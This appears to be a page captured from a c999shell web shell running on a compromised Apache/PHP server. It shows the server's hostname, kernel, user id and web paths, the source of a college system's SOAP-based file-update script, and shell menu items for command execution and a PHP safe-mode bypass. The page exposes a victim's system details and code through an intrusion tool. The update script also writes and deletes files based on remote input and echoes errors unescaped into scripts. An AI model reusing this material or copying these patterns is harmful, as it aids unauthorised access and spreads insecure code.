Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?
include_once("pagebody.php");
//pageHeader();
$pageTitle="การเข้าใช้ระบบงาน";
echo "<table width=100% class=\"pageTitleBgColor\" align=\"center\">\n";
echo "<tr><td align=center>$pageTitle</td></tr>\n";
echo "</table>";
?>
<!--your code here-------------------------------------------------------------------------->
<?
include_once("clsumfileupdate.php");
include_once("clsumfileupdatetemp.php");
include_once("lib/nusoap/nusoap.php");
include_once("lib/nusoap/globalversion.php");
include_once("lib/nusoap/funct.php");
$oFd = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oFd = new umfileupdate($oC);
$oFdt=new umfileupdatetemp($oC);
?>
<?
/////////////////////////////////////////////////////
$collegecode=$GLOBALS["COLLEGECODE"];
$sysId=$GLOBALS["SYS_ID_U"];
$savefiletodir="../"; // real
$server_path=$GLOBALS["SERVER_PATH"];
////////////////////////////////////////////////////
?>
<?
$p=getcwd();
// Create the client instance
$client = new soapclient2($server_path);
$err = $client->getError();
if($err){
//echo '<h2 style="background-color:#ff0000">1 Constructor error</h2><pre>' . $err . '</pre>';
$error="Constructor error :: ".$err;
?>
<script type="text/javascript">
parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
</script>
<?
}
// Call the SOAP method
if($success!="1"){
$result = $client->call('update', array('collegeCode' => $collegecode,'sysId' => $sysId));
$cv=$result;
}
if($client->fault){
//echo '<h2>2 Fault call method update</h2><pre>'; print_r($result); echo '</pre>';
$error="Fault call method update :: ".print_r($result);
?>
<script type="text/javascript">
parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
</script>
<?
}else{
$err = $client->getError();
//echo $err;
//echo $result;
//echo $fileid_want;
if($err || ($result=="" && $fileid_want=="")){ //can not connect server
//echo '<h2 style="background-color:#ff0000">3 Error</h2><pre>' . $err . '</pre>';
$error=$err;
$a=1;
$fileerror="1";
if($oFdt->countfile()=="0"){
?>
<script type="text/javascript">
parent.location.href = "updateFile.php?nofile=3&error=<? echo $error; ?>";
</script>
<?
}else{
?>
<script type="text/javascript">
parent.location.href = "selectFile.php?fileerror=1";
</script>
<?
}
}else{
echo '<h2>Result</h2><pre>' . $result . '</pre>';
if($result=="No"){
$counttotal=0;
?>
<script type="text/javascript">
parent.print_output(1,1);
</script>
<script type="text/javascript">
parent.location.href = "updateFile.php?nofile=1";
</script>
<?
}else{
if($success!="1"){
while($cv!=""){
list($ff,$cv)=split(',',$cv,2);
$cu++;
}
$counttotal=$cu;
}
echo "===============$counttotal";
$pathnow=getcwd();
//create folder fileupdate
if ($handlef = opendir(getcwd())) {
$checkfolder=0;
while (false !== ($file = readdir($handlef))) {
if($file=="fileupdate"){
$checkfolder=1;
}
}
if($checkfolder==0){
mkdir("fileupdate",0775);
}
closedir($handlef);
}
//loop change result
list($fileid_want,$result)=split(',',$result,2);
echo "fileidwant=".$fileid_want."<br>";
echo "result=".$result."<br>";
$names = array($collegecode, $fileid_want, 'filename1', 'filename2','path','text','detail','flagfile','sysId','updatetime','textcode','2549-11-10');
$result1 = $client->call('getfile',array('names' => $names));
if($client->fault){
echo '<h2>Fault call method getfile</h2><pre>'; print_r($result); echo '</pre>';
}else{
//check data--------------------
$text_en=$result1[5];
echo "first=<br>".$text_en;
echo "<br>";
$text_en=base64_decode($text_en);
echo "base64_decode1=<br>".$text_en;
echo "<br>";
$text_en=gzuncompress($text_en);
echo "gzuncompress1=<br>".$text_en;
echo "<br>";
$text_en=base64_decode($text_en);
echo "base64_decode2=<br>".$text_en;
echo "<br>";
$text_en=gzuncompress($text_en);
$textwrite=$text_en;
echo "gzuncompres2s=<br>".$text_en;
echo "<br>";
$text_en2=base64_decode($text_en);
$text_en=base64_decode($text_en);
$text_en=substr($text_en,26,10);
$test_en=base64_encode($text_en);
$text_en=md5($test_en);
if($text_en==$result1[10] || (($text_en!=$result1[10]) && ($result1[7]=="3"))){
chdir($pathnow);
$result1[6]=base64_decode($result1[6]);
echo '<h2>-------------------------</h2>';
echo '<h2>collegeCode</h2><pre>' . $result1[0]. '</pre>';
echo '<h2>fileId</h2><pre>' . $result1[1]. '</pre>';
echo '<h2>filename1</h2><pre>' . $result1[2]. '</pre>';
echo '<h2>filename2</h2><pre>' . $result1[3]. '</pre>';
echo '<h2>path</h2><pre>' . $result1[4]. '</pre>';
echo '<h2>text</h2><pre>' . $result1[5]. '</pre>';
echo '<h2>detail</h2><pre>' . $result1[6]. '</pre>';
echo '<h2>flagfile</h2><pre>' . $result1[7]. '</pre>';
echo '<h2>sysId</h2><pre>' . $result1[8]. '</pre>';
echo '<h2>updatetime</h2><pre>' . $result1[9]. '</pre>';
echo "-------------------------------------<br>";
//set path and create folder
$path="/fileupdate".$result1[4];
$pathfile=$path;
$i=1;
while(strrchr($pathfile,'/')!=""){
$f=strrchr($pathfile,'/');
list($p,$fo) = split('[/]',$f);
$folder[$i]=$fo;
//echo $folder[$i]."<br>";
list($pathfile,$p) = split($f,$pathfile);
$i++;
}
for($j=1; $j<$i; $j++){
$newf[$j]=$folder[$i-$j];
//echo "newf=".$newf[$j]."<br>";
}
////
for($k=2; $k<=$j; $k++){
$checknotfound=0;
$checkfound=0;
chdir($newf[$k-1]);
if ($handle = opendir(getcwd())) {
$checknotfound=0;
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
if($file==$newf[$k]){
$checkfound=1;
}else{
$checknotfound=1;
$save=$newf[$k];
}
}else{
if($file==$newf[$k]){
$checkfound=1;
}else{
$checknotfound=1;
$save=$newf[$k];
}
}
}
if($checknotfound=="1" && $checkfound!=1){
if($save==""){
}else{
mkdir($save,0775);
//chmod($save,0775);
}
}
closedir($handle);
}
}
/////
$fileIwant=$result1[3];
echo "fileIwant=$fileIwant<br>";
unlink($fileIwant);
//if not delete file
if($result1[7]!="3"){
if (!$handle = fopen($fileIwant, 'a')) {
echo "Cannot open file ($fileIwant)";
$error=1;
}
if (fwrite($handle, base64_decode($textwrite)) === FALSE) {
echo "Cannot write to file ($fileIwant)";
$error=1;
}
}
if($error!=1){
//echo "Success, wrote to file ($fileIwant)";
$oFd->SearchByfileId($result1[1]);
if($oFd->GetRecord()=="1"){
$oFd->Delete();
}
$oFd->AddNew();
$oFd->fileId=$result1[1];
$oFd->updateDate=getNowDateth();
$oFd->filename1=$result1[2];
$oFd->filename2=$result1[3];
$oFd->flagfile=$result1[7];
$oFd->flagupdate="D";
$oFd->path=$result1[4];
$oFd->detail=$result1[6];
$oFd->sysId=$result1[8];
$oFd->updatetime=$result1[9];
$oFd->flagselect="N";
$oFd->flagrestore="N";
$oFd->flaguse="N";
$oFd->Save();
$result2 = $client->call('set_to_db', array('fileId' => $result1[1],'collegeCode' => $collegecode));
if($client->fault){
$oFd->SearchByfileId($result1[1]);
$oFd->GetRecord();
$oFd->Delete();
echo '<h2>Fault call method set_to_db</h2><pre>'; print_r($result); echo '</pre>';
}else{
$folderfile=getcwd();
if($result2=="Y"){
$oFdt->AddNew();
$oFdt->fileId=$result1[1];
$oFdt->Save();
chdir($pathnow);
}
}
}else{
$oFd->SearchByfileId($result1[1]);
$oFd->GetRecord();
$oFd->Delete();
} // if error ==1
}else{
$fileerror="1";
if($oFdt->countfile()=="0" || $oFdt->countfile()=="1"){
?>
<script type="text/javascript">
parent.location.href = "updateFile.php?nofile=4";
</script>
<?
}else{
?>
<script type="text/javascript">
parent.location.href = "selectFile.php?fileerror=1";
</script>
<?
}
} //check error file md5()
} //if err method getfile
$countbar++;
//echo "============= $countbar";
$total=$counttotal;
?>
<script type="text/javascript">
parent.print_output(<?php echo $countbar;?>, <?php echo $total; ?>);
</script>
<?
if($result=="" && $fileid_want!=""){
?>
<script type="text/javascript">
parent.location.href = "selectFile.php";
</script>
<?
}
echo "<meta http-equiv='refresh' content='0; URL=submitUpdate.php?result=$result&check=$check&fileid_want=$fileid_want&fileerror=$fileerror&success=1&countbar=$countbar&counttotal=$counttotal'>";
} //if result not No
} // if err method update
} // if fault
?>
<!--------------------------------------------------------------------->
<? //pageFooter(); ?>
<!--------------------------------------------------------------------->
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |